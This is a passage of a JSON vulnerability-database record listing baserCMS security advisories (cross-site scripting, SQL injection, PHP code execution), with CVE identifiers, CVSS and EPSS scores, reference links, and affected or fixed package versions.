coring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15154"},{"reference_url":"https://github.com/advisories/GHSA-cpxc-67rc-c775","reference_id":"GHSA-cpxc-67rc-c775","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cpxc-67rc-c775"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/77910?format=json","purl":"pkg:composer/baserproject/basercms@4.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7"}]
,"aliases":["CVE-2020-15154","GHSA-cpxc-67rc-c775"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d5gk-q2hh-kba5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54257?format=json","vulnerability_id":"VCID-eq7f-n3g5-s3hu","summary":"Cross-site Scripting\nImproper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20681","reference_id":"","reference_type":"","scores":[{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42327","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00203","scoring_system":"epss","scoring_elements":"0.42402","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20681"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN64869876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20681","reference_id":"CVE-2021-20681","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.ni
st.gov/vuln/detail/CVE-2021-20681"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20681","GHSA-24p5-x9f9-vvpx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/38784?format=json","vulnerability_id":"VCID-ffq1-r9ck-1bhp","summary":"SQL Injection\nBaser CMS contains a SQL injection 
vulnerability.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10842","reference_id":"","reference_type":"","scores":[{"value":"0.0067","scoring_system":"epss","scoring_elements":"0.7178","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0067","scoring_system":"epss","scoring_elements":"0.7174","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10842"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10842","reference_id":"CVE-2017-10842","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10842"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1",
"is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"ur
l":"http://public2.vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproject/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-b
ur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6"}],"aliases":["CVE-2017-10842","GHSA-jc94-wp59-pq4f"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ffq1-r9ck-1bhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46297?format=json","vulnerability_id":"VCID-g56w-z9cx-5ygv","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29009","reference_id":"","reference_type":"","scores":[{"value":"0.0055","scoring_system":"epss","scoring_elements":"0.68361","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-29009"},{"reference_url":"https://basercms.net/security/JVN_45547161","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://basercms.net/security/JVN_45547161"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic
_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29009","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29009"},{"reference_url":"https://github.com/advisories/GHSA-8vqx-prq4-rqrq","reference_id":"GHSA-8vqx-prq4-rqrq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8vqx-prq4-rqrq"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq","reference_id":"GHSA-8vqx-prq4-rqrq","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new
-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/685977?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0-beta1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1"}],"aliases":["CVE-2023-29009","GHSA-8vqx-prq4-rqrq"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/47107?format=json","vulnerability_id":"VCID-ggv8-3v9t-mfea","summary":"baserCMS 
Cross-site Scripting vulnerability in Site search Feature\nThere is a XSS Vulnerability in Site search Feature to baserCMS.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-44379","reference_id":"","reference_type":"","scores":[{"value":"0.00622","scoring_system":"epss","scoring_elements":"0.70549","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-44379"},{"reference_url":"https://basercms.net/security/JVN_73283159","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://basercms.net/security/JVN_73283159"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44379","reference_id":"CVE-2023-44379","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_ele
ments":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44379"},{"reference_url":"https://github.com/advisories/GHSA-66c2-p8rh-qx87","reference_id":"GHSA-66c2-p8rh-qx87","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-66c2-p8rh-qx87"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87","reference_id":"GHSA-66c2-p8rh-qx87","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/69105?format=json","purl":"pkg:composer/baserproject/basercms@5.0.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"}],"aliases":["CVE-2023-44379","GHSA-66c2-p8rh-qx87"],"risk_score":null,"exploitabili
ty":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40409?format=json","vulnerability_id":"VCID-gsg3-fdmu-vqag","summary":"Improper Input Validation\nbaserCMS allows remote attackers to execute arbitrary PHP code via the `admin/theme_configs/form`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18942","reference_id":"","reference_type":"","scores":[{"value":"0.00928","scoring_system":"epss","scoring_elements":"0.76457","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00928","scoring_system":"epss","scoring_elements":"0.76486","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18942"},{"reference_url":"https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[],"url":"https://basercms.net/release/4_1_4"},{"reference_url":"https://github.com/baserproject/basercms/issues/959","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/issues/959"},{"reference_url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"H
IGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/","reference_id":"","reference_type":"","scores":[],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18942","reference_id":"CVE-2018-18942","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18942"},{"reference_url":"https://github.com/advisories/GHSA-rjc2-x53r-6c9r","reference_id":"GHSA-rjc2-x53r-6c9r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rjc2-x53r-6c9r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56953?format=json","purl":"pkg:composer/baserproject/basercms@4.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerabili
